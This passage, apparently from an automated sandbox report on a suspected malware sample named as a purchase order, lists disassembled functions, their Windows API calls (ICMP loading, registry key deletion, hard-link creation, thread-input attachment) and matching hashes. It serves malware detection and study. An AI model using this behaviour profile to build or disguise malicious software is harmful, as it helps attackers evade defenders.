                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpCloseHandle
                • API String ID: 2574300362-3530519716
                • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpCreateFile
                • API String ID: 2574300362-275556492
                • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpSendEcho
                • API String ID: 2574300362-58917771
                • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: RegDeleteKeyExW$advapi32.dll
                • API String ID: 2574300362-4033151799
                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(?), ref: 0047950F
                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                • VariantClear.OLEAUT32(?), ref: 00479650
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$AllocClearCopyInitString
                • String ID:
                • API String ID: 2808897238-0
                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                • __itow.LIBCMT ref: 004699CD
                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                • __itow.LIBCMT ref: 00469A97
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$__itow
                • String ID:
                • API String ID: 3379773720-0
                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                Download Yara Rule
                APIs
                • GetWindowRect.USER32(?,?), ref: 00449A4A
                • ScreenToClient.USER32(?,?), ref: 00449A80
                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$ClientMoveRectScreen
                • String ID:
                • API String ID: 3880355969-0
                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                • String ID:
                • API String ID: 2782032738-0
                • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                Download Yara Rule
                APIs
                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                • GetWindowRect.USER32(?,?), ref: 00441722
                • PtInRect.USER32(?,?,?), ref: 00441734
                • MessageBeep.USER32(00000000), ref: 004417AD
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Rect$BeepClientMessageScreenWindow
                • String ID:
                • API String ID: 1352109105-0
                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                Download Yara Rule
                APIs
                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateHardLink$DeleteErrorFileLast
                • String ID:
                • API String ID: 3321077145-0
                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                • __isleadbyte_l.LIBCMT ref: 004208A6
                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                Download Yara Rule
                APIs
                • GetParent.USER32(?), ref: 004503C8
                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Proc$Parent
                • String ID:
                • API String ID: 2351499541-0
                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                Download Yara Rule
                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                • TranslateMessage.USER32(?), ref: 00442B01
                • DispatchMessageW.USER32(?), ref: 00442B0B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Message$Peek$DispatchTranslate
                • String ID:
                • API String ID: 1795658109-0
                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                Download Yara Rule
                APIs
                • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                • GetCaretPos.USER32(?), ref: 004743B2
                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                • GetForegroundWindow.USER32 ref: 004743EE
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                • String ID:
                • API String ID: 2759813231-0
                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                • _wcslen.LIBCMT ref: 00449519
                • _wcslen.LIBCMT ref: 00449526
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend_wcslen$_wcspbrk
                • String ID:
                • API String ID: 2886238975-0
                • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __setmode$DebugOutputString_fprintf
                • String ID:
                • API String ID: 1792727568-0
                • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                Memory Dump Source
